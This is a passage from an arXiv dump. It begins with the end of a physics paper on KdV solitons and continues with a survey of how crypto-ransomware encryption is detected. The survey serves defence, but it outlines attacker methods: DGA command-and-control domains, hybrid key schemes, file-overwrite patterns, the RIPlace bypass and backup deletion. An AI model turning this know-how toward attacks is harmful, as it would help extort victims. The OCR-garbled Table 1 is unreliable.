\[\frac{dp}{df}\cdot\left(-\frac{2}{3}V_{0}^{\prime}(\overline{u})\overline{u}_ {x}f\right)=-V_{0}(\overline{u})\overline{u}_{x}p\] and, hence, \(f(p)=p^{2/3}\), \(p=\kappa^{3}\). Thus, we obtain the Hamiltonian \[H=V_{0}(\overline{u}(x,t))p+\frac{3}{5}p^{5/3} \tag{48}\] and the Hamilton equations \[\frac{dp}{dt}=-V_{0}^{\prime}(\overline{u})\overline{u}_{x}p,\qquad\frac{dx}{ dt}=V_{0}(\overline{u})+p^{2/3}. \tag{49}\] Let us apply the developed theory to the problem of propagation of solitons in case of the nonlinearity function (37) and for the initial background wave distribution \[\overline{u}_{0}(x)=\left\{\begin{array}{ll}a(x/5)^{1/\gamma},&x>0,\\ 0,&x<0.\end{array}\right. \tag{50}\] Then the solution of the Hopf equation (1) reads \[\overline{u}(x,t)=a\left(\frac{x}{t/\tau+5}\right)^{1/\gamma},\quad\tau=\frac {1}{6a^{\gamma}}, \tag{51}\] and \(V_{0}(\overline{u})\) is given by \[V_{0}(\overline{u}(x,t))=\frac{x}{t+5\tau}. \tag{52}\] Let the soliton start its motion at the point \(x=0\) at the moment \(t=t_{0}>0\) with the initial velocity \(v_{0}\). Then Eq. (44) takes the form \[\frac{dx}{dt}=\frac{1}{3}\frac{x}{t+5\tau}+v_{0} \tag{53}\] and it can be easily solved to give \[x(t)=\frac{3}{2}v_{0}(t+5\tau)\left\{1-\left(\frac{t_{0}+5\tau}{t+5\tau} \right)^{2/3}\right\}. \tag{54}\] The soliton's amplitude along the path can be found from Eqs. (34), (35) with \[\Phi(\overline{u})=\frac{6}{(\gamma+1)(\gamma+2)}\overline{u}^{\gamma+2} \tag{55}\] and \(V\) is defined by Eq. (53). These analytical predictions are compared with numerical solutions of Eq. (31) in Fig. 2 and very good agreement is observed. ## IV Conclusion We showed that the KdV soliton dynamics along a large-scale background wave can be reduced to Hamilton equations with the use of elementary perturbation theory argumentation. Preservation of the Hamiltonian structure by the dispersionless flow leads to a simple relationship between the inverse half-width of a moving soliton and a local value of the background wave. 
This relationship can be interpreted as an analytical continuation of the relationship between the carrier wave number of a wave packet propagating along a large-scale background wave which follows from the well-known optical-mechanical analogy where the packet's dynamics is also treated by the Hamilton methods. This type of reasoning first introduced by Stokes allows one to extend the theory to the generalized KdV equation case and the analytical results are confirmed by comparison with exact numerical solutions. We believe that our approach based on preservation of Hamiltonian dynamics of both high-frequency wave packets and narrow solitons by dispersionless hydrodynamic flow can be applied to other problems of soliton dynamics. Figure 2: Paths \(x(t)\) of the solitons propagating along the background waves (51) for different data sets \((\gamma,a,v_{0},x_{0})\): gray \((2,0.25,40,-20)\), brown \((1.5,0.1,15,-25)\) and green \((0.8,0.005,10,0)\). The circles correspond to the numerical solution of Eq.(31), the solid lines to Eq. (53), and the dashed lines correspond to free motion of the soliton along a zero background. ###### Acknowledgements. This research is funded by the research project FFUU-2021-0003 of the Institute of Spectroscopy of the Russian Academy of Sciences (Section II) and by the RSF grant number 19-72-30028 (Section III).
2306.12008
Cryptographic ransomware encryption detection: Survey
The ransomware threat has loomed over our digital life since 1989. Criminals use this type of cyber attack to lock or encrypt victims' data, often coercing them to pay exorbitant amounts in ransom. The damage ransomware causes ranges from monetary losses paid for ransom at best to endangering human lives. Cryptographic ransomware, where attackers encrypt the victim's data, stands as the predominant ransomware variant. The primary characteristics of these attacks have remained the same since the first ransomware attack. For this reason, we consider this a key factor differentiating ransomware from other cyber attacks, making it vital in tackling the threat of cryptographic ransomware. This paper proposes a cyber kill chain that describes the modern crypto-ransomware attack. The survey focuses on the Encryption phase as described in our proposed cyber kill chain and its detection techniques. We identify three main methods used in detecting encryption-related activities by ransomware, namely API and System calls, I/O monitoring, and file system activities monitoring. Machine learning (ML) is a tool used in all three identified methodologies, and some of the issues within the ML domain related to this survey are also covered as part of their respective methodologies. The survey of selected proposals is conducted through the prism of those three methodologies, showcasing the importance of detecting ransomware during pre-encryption and encryption activities and the windows of opportunity to do so. We also examine commercial crypto-ransomware protection and detection offerings and show the gap between academic research and commercial applications.
Kenan Begovic, Abdulaziz Al-Ali, Qutaibah Malluhi
2023-06-21T04:11:52Z
http://arxiv.org/abs/2306.12008v1
# Cryptographic ransomware encryption detection: Survey ###### Abstract The ransomware threat has loomed over our digital life since 1989. Criminals use this type of cyber attack to lock or encrypt victims' data, often coercing them to pay exorbitant amounts in ransom. The damage ransomware causes ranges from monetary losses paid for ransom at best to endangering human lives. Cryptographic ransomware, where attackers encrypt the victim's data, stands as the predominant ransomware variant. The primary characteristics of these attacks have remained the same since the first ransomware attack. For this reason, we consider this a key factor differentiating ransomware from other cyber attacks, making it vital in tackling the threat of cryptographic ransomware. This paper proposes a cyber kill chain that describes the modern crypto-ransomware attack. The survey focuses on the Encryption phase as described in our proposed cyber kill chain and its detection techniques. We identify three main methods used in detecting encryption-related activities by ransomware, namely API and System calls, I/O monitoring, and file system activities monitoring. Machine learning (ML) is a tool used in all three identified methodologies, and some of the issues within the ML domain related to this survey are also covered as part of their respective methodologies. The survey of selected proposals is conducted through the prism of those three methodologies, showcasing the importance of detecting ransomware during pre-encryption and encryption activities and the windows of opportunity to do so. We also examine commercial crypto-ransomware protection and detection offerings and show the gap between academic research and commercial applications. + Footnote †: 0167-4048/p. 2023 The Author(s). Published by Elsevier Ltd.] ## 1 Introduction The incursion of digital and online lifestyles in almost every segment of our lives has brought multiple consequences related to dependence on integrity and availability of information in business and personal matters. One of those consequences is our inability to live, work or even receive life-dependent services like medical treatment or water and electricity supply if related digital resources and data are unavailable or compromised. Cybercrimes are seeing significant growth across all geographies, with ransomware being the leading type of attack (Singleton et al., 2021). Ransomware is a type of attack where malicious actors utilize multiple tactics and techniques to gain the capability to lock or encrypt a victim's data. This attack usually results in an ultimatum where the victim-user either pays for unlocking or decryption keys or faces losing all their data. Due to the already mentioned dependency on digital lifestyle, data is constantly growing in importance, creating an environment for a very lucative business for ransomware gangs since the first recorded attack in 1989. While crypto-ransomware is a more common type of attack and lock-ransomware is in the decay (Berrueta et al., 2019), the latter is still relevant, especially in the mobile platforms (Su et al., 2018). According to a Fortinet survey, ransomware grew by 1070% across different industry verticals between July 2020 and June 2021 (Fortinet, 2021). Critical services like the health sector, especially in the age of the COVID-19 pandemic, have been particularly vulnerable and targeted--the U.S. Health and Human Services Department has tracked 82 ransomware attacks in the first five months of 2021. 
The average cost of the incident in the U.S. health sector was around USD1.27 million, even though only USD131,000 was the average cost of the ransomware payment (U.S. Department of Health and Human Services Cybersecurity Program, 2021). The rest of the cost was distributed across lost business costs, including increased customer turnover, lost revenue due to system downtime, and the increasing cost of acquiring new business due to diminished reputation. Depending on the industry and geography, in other sectors worldwide, the ransom ranged between USD7.75 million and USD0.37 million, making the average cost of ransomware incidents in 2021 USD1.85 million (Sophos, 2021). The ransomware threat goes even further, with the Conti ransomware group announcing their support for the Russian invasion of Ukraine at the end of February 2022 and ac tive participation in cyber warfare utilizing their capabilities and the available access to various assets worldwide (Russia-based ransomware group Conti issues warning to Kremlin fees | Reuters). Despite all the reporting and high-profile cases of ransomware attacks, they continue to flourish and grow in sophistication and effectiveness. The reason for this probably lies in the fact that, according to Fortiner's survey in 2021, 96% of companies that were already victims of ransomware gangs responded that they were moderately ready for the ransomware attack, even though 16% of them suffered from three or more attacks (Fortiner, 2021). As shown in Fig. 1, in industries like Professional Services, Government, and Healthcare, the percentage of ransomware attacks as a portion of all cyber attacks is 35%, 33%, and 28%, respectively, making this type of attack by far the most common attack overall (Singleton et al., 2021). Nevertheless, another trend was noticed in Sophos' research on the state of ransomware. The malicious ransomware actors are moving away from generic and automated large-scale attacks to more targeted attacks executed with precision and persistence (Sophos, 2021). A review of the available data on modes of ransomware groups' operation points to apparent similarities with the Advanced Persistent Threat modus operandi. This observation partially explains the increase in the difficulty of detecting and defending against these attacks compared to defending against malware like common viruses, trojans, or worms. In the targeted crypto-ransomware attack, the malicious actor uses various techniques to gain the capability to encrypt the victim's data. Such techniques evolve, becoming more focused (Sophos, 2021) and using precise no-noise attacks on the networks (Wang et al., 2018). Despite the shifting of techniques and some tactics, cryptographic ransomware carries one differentiating characteristic that separates it from malware: the capability and goal of encrypting victims' data so that only malicious actors can decrypt it upon the ransom payment. In this survey, existing proposals of pre-encryption and encryption detection techniques were reviewed to show their importance in countering ransomware and the possibility of being the ultimate solution for eliminating this threat. Detecting and countering crypto-ransomware has long been at the forefront of scholarly research. With the advent of the COVID-19 pandemic, motivation for ransomware attacks increased, and research interest in this topic has grown to an ever-larger extent. 
Most pre-encryption and encryption detection solutions operate in a host-based environment focusing on file system and kernel activity monitoring. However, some detection solutions focus on network communication inside local target networks and communication with command and control servers. The latter algorithms do not necessarily utilize network information to detect DNS-based indicators of compromise (IOC) but also deep packet inspection to detect cryptographic key delivery and exfiltration. The comprehensive set of algorithms and techniques to detect pre-encryption and encryption varies from simple decoys placement and file integrity monitoring to complex machine learning (ML) models trained on monitoring systems' behavior during encryption and encryption-related operations, such as key generation. The survey also focuses on encryption-related detection in crypto-ransomware, and any further references to ransomware are related to the encryption of victims' data by malicious actors with the purpose of extortion. After introducing the topic of cryptographic ransomware, this paper covers related survey-like works available at the time of writing in the section 1.1 _Related Work_. Further, we propose a cyber kill chain to describe cryptographic ransomware attacks and discuss each of the defined phases in the kill chain, describing the behavior and methodology of attacks. In the survey part of the paper, we review research on the detection of activities related to the Encryption phase as described in the discussion of the proposed cyber kill chain. We also provide a brief survey of commercial solutions and usage of encryption detection outside of the crypto-ransomware use case. ### Related work Several surveys related to ransomware have been published, primarily focusing on defining the characteristics of ransomware attacks. However, there were no previous attempts to build a survey of detection techniques related to encryption as a hallmark of ransomware attacks. Recent literature on ransomware threats is largely focused on three main streams. The first stream revolves around identifying recent ransomware threats based on static and dynamic analysis developed by the scientific community. The second stream aims to classify ransomware threats without necessarily focusing on detection algorithms. Finally, the third stream engages with holistic ap Figure 1: Percentage of attack types per industry (Singleton et al., 2021). proaches to ransomware techniques and tactics. The following will briefly present these studies. With regard to the first stream, Moussaileb et al. (2021), in their survey of ransomware threats to Windows operating systems, have unified all detection techniques based on static and dynamic analysis developed by the scientific community since 2014. This survey treats both crypto and locking ransomware types and, despite the title and general topic of the paper, covers some Android ransomware cases as well. The existing surveys focus on crypto ransomware strictly (Berrueta et al., 2019), noting the difficulty of surveying this novel topic since data from various papers is impossible to compare due to different metrics and approaches to ransomware. Regarding studies focusing on the second stream, in an earlier attempt to survey research on ransomware, Alrimy et al. (2018) provided a comprehensive classification of ransomware attacks but with few details on detection algorithms. Also worth mentioning is a paper by Eze et al. 
(2018), that attempted a holistic examination of ransomware techniques and tactics in a very general and brief manner. Other survey-like papers focus on the evolution of the ransomware phenomenon (Zavarsky and Lindskog, 2016) or actual empirical data about real-world attacks (Connolly et al., 2020). In their survey of ransomware detection solutions, Herrera Silva et al. (2019) focus on identifying and listing all the detection and prevention parameters identified in the surveyed research, and they consider situational awareness concerning the same. About the third stream, which takes more innovative approaches, more comprehensive surveys (Oz et al., 2022) cover all available varieties of platforms targeted by ransomware and consider the historical context and chronology of ransomware development. Other similar works (Dargaili et al., 2019) take the systematization of ransomware features' taxonomy as a center of their proposal, and, similar to ours, the authors propose a cyber kill chain that attempts to describe and encompass all ransomware behavior observed so far. Also, some proposals focus on certain operating systems like Android (Ameer et al., 2018), Windows (Moussaileb et al., 2021; Reshmi, 2021; Naseer et al., 2020), or methods and tools in detection like a machine and deep learning and big data (Urooj et al., 2022; Bello et al., 2021). Finally, some proposals seek to build benchmarks for researchers who want to introduce more innovative approaches in ransomware detection mechanisms (Maigida et al., 2019). Cryptographic ransomware detection has interested the academic community and the cybersecurity industry. Methodologies and techniques for detection use static and dynamic analysis of components and actions belonging to the cryptographic ransomware lifecycle phases. Some focus on local user machines, user and program activities, and the state of files in memory and file systems. Others look at the network indicators of ransomware presence, ranging from detecting single ransomware based on its signature to complex heuristic techniques and machine learning algorithms looking at multiple stages of the ransomware lifecycle. Digging deeper into the available literature, it is noticeable that only some research papers focus on the issue of encryption in crypto-ransomware. Those usually concentrate on machine learning algorithms (Kok et al., 2020) or methods like frequency of encryption estimation (Mulders, 2017). Furthermore, approaches focusing on the state of files in the file system (Jethva et al., 2020; Jung and Won, 2018), monitoring of the hardware performance (Dimov and Tsonev, 2020), and even the energy consumption (Azmoodeh et al., 2018) show promising results in detecting encryption. This paper aims to survey contributions to the research of _encryption detection_ in ransomware and techniques valuable for detecting the ransomware Encryption phase. The analysis does not employ first-hand information like in some other more general surveys on the crypto-ransomware (Berrueta et al., 2019). Instead, it focuses on results in other scientific and industry-based propositions with a strong focus on encryption detection. 
The outline of the contributions of this paper relative to the recent ransomware surveys can be summarized as follows: * Compared to other survey papers in the field, this survey provides a deeper dive into the detection of encryption by compartmentalizing the detection of encryption techniques and treating them as independent cases, even if they are part of a hybrid solution. * We identify a widening gap between richly-diverse academic literature on the detection of encryption techniques on the one hand and commercial implementations in market-leading solutions on the other. * We provide an overview of some of the key challenges and, in our view, misconceptions when approaching the topic of crypto-ransomware. * We present the need for a better organized cyber kill chain that describes the modern crypto-ransomware attack. * We propose a needs-based, field-informed contemporary cyber kill chain. For completeness, an apt description and classification of cryptographic ransomware attacks in their methodologies and phases will be presented with a brief classification of detection techniques. ## 2 On crypto-ransomware behavior and methodology The crypto-ransomware attack is characterized by a specific action of encrypting victims' data with the intention to extort financial or other benefits as a ransom for decryption. Researchers have observed distinct actions that mark noticeable separate phases of a ransomware attack (Moussaileb et al., 2021; Berrueta et al., 2019; Al-rimy et al., 2018; Eze et al., 2018). After a careful examination of different proposals for ransomware-specific kill chains, as well as the growing tendency of ransomware groups to carefully choose the target and emulate Advanced Persistent Threats (Sophos, 2021), we synthesized our findings and, as a result, identified four distinct phases of a crypto-ransomware attack. Our proposal for a kill chain is shown in Fig. 2. ### 2.1 Phases of the attack Many other surveys use ransomware kill chains with different numbers and scopes of phases. We propose a kill chain with four distinct steps or phases for a ransomware attack. The kill chain, presented in Fig. 2, was found to be the best fit to focus on detecting encryption as a defining characteristic of cryptographic ransomware attacks. The following section will explain in detail the essential characteristics of each of the four phases of our kill chain, namely Initial compromise, Establishing foothold, Encryption, and Extortion, to present ransomware's lifecycle and emphasize the importance of the Encryption phase. #### 2.1.1 Initial compromise Initial compromise marks the phase in which a ransomware attack compromises the first computer. Various methods for delivering and executing initial compromise include phishing, spear-phishing, corrupt web pages, and actual security bugs and system misconfigurations (vulnerabilities). Fig. 3 shows the most common methods of initial compromise based on original research by the authors, covering the years between 2013 and 2021. As presented in Fig. 3, phishing is the most common method for initial compromise, often combined with exploiting vulnerabilities or corrupted websites. Locky and TeslaCrypt ransomware (Berrueta et al., 2019) utilize domain generation algorithms (DGA) to create domain names dynamically. DGA's purpose is to make it difficult for defenders to discover and block C2 servers' names and/or IP addresses.
In order to keep its activity hard to detect and yet avoid total randomness, a DGA uses some of the following building elements: * Seed, which can be a word(s) and/or number(s), is a building element introduced by ransomware DGA writers, and it can be changed to segregate C2 domain names between different versions or groups of victims. * Time-based is the element that changes dynamically with time. It does not necessarily need to be influenced by time or date, and some other event can trigger it; the only condition is that it changes over a period of time. * Top-level domains (TLDs) are the final part of DGA-created domain names. The first two create the body of a domain name by being combined, and then a predetermined TLD is added. TLDs like "xyz," "top," and "bid" are very popular when creating DGA domains (Antra, 2016). Ransomware C2 servers' communication plays a prominent role in many proposed ransomware detection mechanisms that detect C2 IPs and domain names in the ransomware tools and network traffic. These can be used in activities from deny-listing all the way to detecting DGA-created domain names in DNS queries to be used with DNS sinkholes (Dynamic Resolution: Domain Generation Algorithms, Sub-technique T1568.002 - Enterprise | MITRE ATT&CK®). #### 2.1.3 Encryption The Encryption phase of a ransomware attack includes the following steps: encryption key generation, obtaining a public key from the C2 server, searching the file system, encryption, exfiltration of data with specific extensions or in particular folders, and deletion of possible backups like shadow volumes. Different ransomware families use various encryption schemes to encrypt their victims' data. Whether the attacker chooses to use symmetric, asymmetric, or a combination of both directly influences cryptographic key generation and management during the Encryption phase of the attack. Table 1 names prominent ransomware families since 1989 and their choice of encryption. Among these cryptographic methods, symmetric encryption and a combination of symmetric and asymmetric encryption are most commonly used, while asymmetric encryption alone is used much less. While researching sources for information contained in Table 1, the authors have compiled data from these sources to create Fig. 4, which shows the distribution of various encryption algorithms' usage from the first ransomware attack in 1989 to the end of 2021. In the case of exclusive symmetric encryption use, key generation is done by either using local operating system cryptographic capabilities or a custom implementation of cryptographic algorithms. In Microsoft Windows, ransomware uses the function BCryptGenRandom from the Cryptography API: Next Generation (CNG), as exemplified by Noberus ransomware (Noberus), or CryptGenRandom, as in Maze ransomware (Ransomware Maze, 2020). In Apple's macOS and iOS, the SecRandom function offers similar capabilities to CryptGenRandom, while Linux, along with several other UNIX-like operating systems, implements getrandom as a system call. Ransomware for the latter operating systems uses open-source libraries like mbedtls - examples are seen in KeRanger (New OS X Ransomware KeRanger Infected Transmission BitTorrent Client Installer, 2016) and RansomEXX (RansomEXX Trojan attacks Linux systems, n.d.) ransomware. When an asymmetric encryption scheme is used, the secret key is sometimes protected in remote secure storage. In the case of local generation of the keypair, the secret key is encrypted with another C2-provided public key.
The public key is either locally generated together with a secret key, supplied by a C2 server, or both. Ransomware like Cerber used a C2-supplied RSA public key to encrypt a locally generated RSA secret key, which in turn was used to encrypt the locally generated RC4 key used for encrypting the victim's files (Sala). On the other hand, CryptoWall ransomware would not start encryption unless a 2048-bit RSA key was received from C2 (Cabaj et al., 2015). In most cases, successful ransomware attacks combine symmetric ciphers like Rijndael, ChaCha/Salsa20, or RC4 together with asymmetric ciphers like RSA or ECC. This is primarily due to the speed advantage that symmetric ciphers provide over asymmetric encryption when encrypting a large volume of data. In scenarios where the secret key remains on the C2, asymmetric encryption is a good option to encrypt the symmetric key. This way, the responders to that attack would not be able to use it for decryption before paying the ransom. Speed is also a factor in locating the files to be encrypted by ransomware. Some attackers infect all drives alphabetically (in Windows-based attacks), while some limit infection to specific user folders like Desktop or Documents. Most sophisticated ransomware provides whitelist exclusion of specific system folders and system configuration files to maintain the operating system's functionality after the encryption (Lemmou et al., 2021). During the actual encryption, ransomware applies four tactics: reading, encrypting in memory, writing to the file system, and removing original files. While reading a file, ransomware like CryptoWall tries to read files in one read, reducing the number of read/write operations (Lemmou et al., 2021). On the other hand, ransomware can use fixed block lengths for reading and writing files during encryption. WannaCry or LockerGoga ransomware read files in 256 KB and 64 KB blocks, respectively (Loman, 2019). The third approach to encryption is when ransomware performs a read of a fixed buffer from the beginning or from the end of the file twice before committing a write to the file system. This behavior has been observed in the Spora ransomware, which uses two read operations from the end of each file, checking for ransomware-added marker values, to establish whether the file is already encrypted (Lemmou et al., 2021). Finally, ransomware can write directly to the original file and then optionally rename it during the destruction of the original files. Another way of destruction is saving encrypted files in a new location and then deleting, moving, or overwriting the original. A third method includes moving the original file to some temporary location, overwriting it with encrypted data, and then moving it back to its original place in the file system. RIPlace is a newer technique of replacing the original files with encrypted files that has been able to bypass all of the known protection systems for the Windows family of operating systems (CISOMAG, 2019).

Figure 4: Usage of encryption algorithms by major ransomware families 1989 - 2021

Found in ransomware like Thanos (Walter), RIPlace utilizes the IRP_MJ_SET_INFORMATION system callback in combination with the legacy DefineDosDevice function to delete original files, while renaming is performed on both original and encrypted files.
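These read/encrypt/write/rename bursts are precisely the behavioral signals that many of the detectors surveyed in Section 3 key on. As a purely illustrative sketch (the event format, thresholds, and window size are assumptions, not taken from any surveyed system), a minimal per-process heuristic over a stream of file-system events might look like this:

```python
from collections import defaultdict

# Hypothetical event format: (pid, op, path), where op is one of
# "read", "write", "rename", "delete". Thresholds are illustrative only.
SUSPICIOUS_OPS = {"write", "rename", "delete"}
MIN_OPS = 50             # suspicious operations per observation window
MIN_DISTINCT_FILES = 30  # distinct files touched per observation window

def flag_suspicious(events):
    """Return PIDs whose activity in one window resembles a bulk
    read -> encrypt -> write -> rename/delete pattern."""
    op_counts = defaultdict(int)
    touched = defaultdict(set)
    for pid, op, path in events:
        if op in SUSPICIOUS_OPS:
            op_counts[pid] += 1
            touched[pid].add(path)
    return [pid for pid, n in op_counts.items()
            if n >= MIN_OPS and len(touched[pid]) >= MIN_DISTINCT_FILES]
```

Real products combine such counters with many other signals (entropy, decoys, API hooks) precisely because a rate heuristic alone is easy to evade and prone to false positives, for example during backups or bulk file conversions.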
Deletion of backup files most commonly occurs with the deletion of Windows Volume Shadow Copies using operating system tools or through encryption of shared drives when some sort of NAS solution is deployed for backup purposes.

#### 2.1.4 Extortion

Once the files are entirely or, in some cases, partially encrypted, the ransomware creates a ransom note as a text or HTML file instructing the victim on what to do in order to retrieve their data. Payment of ransom in the extortion phase of a ransomware attack has represented a difficulty for cyber-criminals since ransomware's first appearance in 1989. The inability to remain anonymous pushed early ransomware attackers to use payment means like premium-rate text messages or pre-paid vouchers like Paysafe cards (Oz et al., 2022) in the times before the appearance of cryptocurrency. After the introduction of Bitcoin in 2009, most ransomware attackers moved towards cryptocurrency ransom payments in the Extortion phase of the attack. In 2012, the locker ransomware Reveton was the first Ransomware-as-a-Service (RaaS) and the first ransomware to demand payment in Bitcoin. Among cryptographic ransomware, CryptoLocker in 2013 was the most advanced and among the first to strongly emphasize payment by Bitcoin (Liao et al., 2016). Section 2.1 has outlined the main characteristics of all four kill chain phases. We identified the most common instances of crypto-ransomware behavior and methodology. However, in order to adapt this kill chain into actionable recommendations necessary for the effective prevention of ransomware, the following sections will introduce a novel approach where the focus in detecting ransomware is concentrated on the detection of Encryption as conceptualized in the previous section.

## 3 Detection of encryption

Research in detecting ransomware in general, through various phases of attacks, has snowballed in the past several years. Focused research on cryptographic ransomware follows this general trend of a tremendous increase in published research; however, most surveys remain focused on all attack phases described previously in section 2.1. Encryption is the defining characteristic of a crypto-ransomware attack. The usage of different encryption algorithms, as shown in Fig. 4, and the choice of symmetric, asymmetric, or a combination (hybrid) of encryption schemes, as shown in Table 1, show how cryptographic ransomware closely followed cryptographic trends in its evolution and how encryption itself continues to be the one differentiating characteristic that is the most obvious candidate factor for detecting the attack. When researching the phenomenon of cryptographic ransomware through time, we observe that despite the evolution of this threat from plain malware to something similar to an advanced persistent threat (APT), encryption remained a unique characteristic that separates this ransomware from other information security threats. The capability to encrypt without any control gives ransomware attackers the primary motivation and purpose for executing the attack. With that in mind, we surveyed and classified methodologies used to detect ransomware while operating inside the Encryption phase of the attack.
The scholarly literature on ransomware detection largely clusters around the following three major groups: * API and system call monitoring-based detection * 1/0 monitoring-based detection * file system operations monitoring-based detection that include * scanning for high entropy in files and * monitoring deception tokens in file system-based detection. Machine learning (ML), even though sometimes covered as a separate methodology in encryption detection, is cross-cutting the three previously mentioned methodologies depending on informa \begin{table} \begin{tabular}{p{34.1pt} p{142.3pt}} \hline \hline Encryption scheme & Ransomware families in chronological order \\ \hline Symmetric encryption & AIDS trojan (PC Cyborg) (Case Study), GPCode (Emm, 2008), Crypzip (Cryzip Ramsonware Trojan Analysis), MayArchive \\ & (MayArchive Descriptor | F-Secure Labs), Symplectouer (Ameer et al., 2018), TeslaPCuper (Iemman and E. M. Souidi, 2018), ToMe (Meet "Tox", 2015), Terrentrodtocker (Wyke and Ajana, 2015), DMALocker (Rahgerton et al., 2021), Korfit (Reshri, 2021), Jigsaw (Conti et al., 2018), Cerpetu (Pielnot et al., 2018), CryptOX (Berreta et al., 2019), Enigma (Berreta et al., 2019), Bart (Reshri, 2021), Footnote 2.1.1.1.1.1.2.1.2.1.3. (Ekornetas et al., 2019), Stat (Reshri, 2011), Spora (Labs, 2017b), KIIbS(Linux) (Conti et al., 2018), Cryptyshoak (Reshri, 2021), DoubleTocker (Iipovskiy et al., 2018), Cryptyshoak (Bernreta et al., 2019), Pactcher (Ransomware Recap), Rewenge (GoldSparrow, 2017), BTCware (Wood and Eze, 2020), ErbEu(Wijn) (Ransomware Recap), Wannaker (Hui et al., 2020), Gibon (Globson Ransomware), Locker (Berreta et al., 2019), Retwawge (Reshmi, 2021), Sactra (Berreta et al., 2019), Netwalk (Take a NetWalk) (Meet, 2020), Try2Cry (Try2Cry Ransomware - IBM X-Force Collection), EKING (Zhang, 2020), Conti (Conti Ransomware), LV (Iwanwanware), 54B847Rollicka(Karcine Atkingt: Meet the Sabbath Ransomware Affilitate Program, Again | Mandiant) Archivesives (See Study), Cryptoberse (Heng and Balmins, 2016), CryptoWahl (Cabaj et al., 2015), Virkork (crypto version) (Zavarsly and Lindslog, 2016), CryptoWahl (Berreta et al., 2019), Linux.Encoder (Berreta et al., 2019), Chimera (Conti et al., 2018), SANSam (Berreta et al., 2019), Globenproster (Berreta et al., 2019), Hermez1.3 (Shevchwe et al., 2017), Katyush (Reshri, 2021), Thaosos Ransomware, (2020), Hwe (Walter), NetwmV (N37WORM) tansomware emerges in new of cyberattacks in Israel \\ Combination of symmetric and asymmetric encryption & GPCode (Blackamaleri), Cryptooker (Hansherry et al., 2014), CTSlocker (Weckstein et al., 2016), DMALocker4.0 \\ encryption & (Raheem et al., 2021), Lockey (Almashhadani et al., 2019), Petya (Aiden et al., 2017), KeRanger (Conti et al., 2018), Anubis (GoldSparrow, 2016), Matrix (Threat Assessment, 2021), KillDisk(Wijn) (Conti et al., 2018), Sage (Labs, 2017c), ErbEu(Linux) (ErbEu's Resources as Linux Ransomware, 2017), Wannander (Chen and Bridges, 2017), Crysis (Crisis Zansomware Gaining Football, Setsights to Take Over TestScript - Wiadomonol) iepez tion used as features in the dataset that the ML model is trained on. The usage of machine learning in ransomware detection is prevalent in hybrid proposals that employ data from different groups. The same is true for detecting activities in the Encryption phase of the attack. 
While some of the proposals are included in the survey for their specific use and discussion of machine learning issues related to the detection of ransomware pre-encryption and encryption activities, often in combination with other methods, categorization into the major groups described previously was done based on the models' input features. ML ransomware encryption detection includes machine learning techniques and algorithms used to detect encryption and related activities by ransomware attacks in hybrid and pure implementations. The following section presents the state-of-the-art methodologies used to detect ransomware inside the Encryption phase of the attack.

### API and system calls monitoring

Monitoring of function and system calls to detect activity related to file encryption aims at detecting encryption at early stages. At this point, API functions and system calls related to encryption operations appear in the dynamic monitoring of events in an operating system or in the static analysis of binary files. Depending on the operating system, the dynamic detection mechanism focuses on API functions or system calls, while static analysis employs a more comprehensive observation of a set of function calls and text strings. This method is often part of a hybrid solution for ransomware detection. While proposing machine learning solutions for static and dynamic analysis of files suspected of being ransomware, Sheen and Yadav (2018) identified ransomware's most commonly used API calls. Table 2 presents those API calls relevant to detecting the Encryption phase of ransomware attacks, with a brief explanation of their purpose in the Windows operating system. Their solution's performance was measured on the ML model's success in differentiating between benign and malicious utilization of all defined features. Notably, these API functions were also found in other research. Some authors propose a detection model for ransomware using monitoring of API calls and develop pre-encryption detection algorithms (Yadav et al., 2021); even though their paper outlines methods and goals, it does not yet provide concrete solutions. Others use natural language processing (NLP) with convolutional neural networks to analyze API sequences extracted from both ransomware and benign processes in a secure sandbox (Qin et al., 2020). Observing sequences of API calls in machine learning solutions was also applied by Ahmed et al. (2020) in their enhanced Minimum Redundancy Maximum Relevance method, where the most relevant features fine-tuned from system calls were not necessarily encryption-related. Similarly, Almousa et al. (2021) consolidated Windows operating system API calls found in 51 collected ransomware families with common API calls in software to train machine learning models to detect ransomware. In the case of Mehnaz et al. (2018), with their RWGuard proposal and its CryptoAPI Function Hooking (CFHK) Module, they implement a technique of intercepting CryptoAPI calls by hooking functions in memory address space (shifting and mandatory JMP instruction intercepts) and securely storing the observed CryptoAPI activity. Kok et al. (2020a) focus their research on extracting API calls from various ransomware samples prior to encryption, in particular calls to APIs containing the word 'crypto', while the sample was running in a sandbox. Their pre-encryption detection algorithm used a machine learning model trained on the extracted API calls dataset.
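Abstracting from the individual systems above, most of these API-based detectors share the same pipeline: represent each execution trace as a bag or n-gram profile of API-call names and train a conventional classifier on labeled traces. A minimal sketch of that pipeline is shown below; the call sequences and labels are placeholder data, not drawn from any surveyed dataset, and the choice of a Random Forest is illustrative.

```python
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import make_pipeline

# Placeholder traces: each string is the ordered list of API calls
# observed while one sample executed in a sandbox.
traces = [
    "CryptGenRandom CryptEncrypt WriteFile MoveFileExA DeleteFileA",  # ransomware-like
    "CreateFileW ReadFile CloseHandle WriteFile",                     # benign-like
]
labels = [1, 0]  # 1 = ransomware, 0 = benign

# Unigrams keep individual call names; bigrams capture short call sequences.
model = make_pipeline(
    CountVectorizer(token_pattern=r"[^\s]+", ngram_range=(1, 2), lowercase=False),
    RandomForestClassifier(n_estimators=100, random_state=0),
)
model.fit(traces, labels)
print(model.predict(["CryptEncrypt WriteFile DeleteFileA"]))
```

The interesting design decisions in the surveyed papers lie almost entirely in what replaces the placeholder features here: pre-encryption boundary vectors, mutual-information-based feature selection, or sequence models instead of bag-of-calls counts.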
The limitation of the Kok et al. algorithm is its reliance on Windows API calls, which leaves it unable to detect ransomware that uses custom encryption functions. Another example of looking at pre-encryption API calls is the work of Al-Rimy et al. (2020), who established a two-component detection system consisting of Dynamic Pre-encryption Boundary Definition (DPBD) and Features Extraction (FE). The former creates the pre-encryption boundary vector with all cryptography-related APIs used to define the boundary of the pre-encryption activities. The latter extracts all relevant pre-encryption features for use in detection. Arabo et al. (2020), observing API calls made by DLLs in Windows in their hybrid solution proposal, pointed out the correlation between process behavior and ransomware activity in the pre-encryption and encryption stages. A similar proposal, focusing on the Android operating system, came from Scalas et al. (2019), who argued that using System API observation in detection systems performs better than solutions that combine more complex ransomware indicators. On the static observation of API functions related to encryption, the CryptoHunt system proposed by Xu et al. (2017) deals with obfuscation in binary files that prevents detecting Windows Cryptographic API or OpenSSL functions. While this proposal was resilient to various obfuscation techniques, some crucial elements of the process, such as detecting custom cryptographic 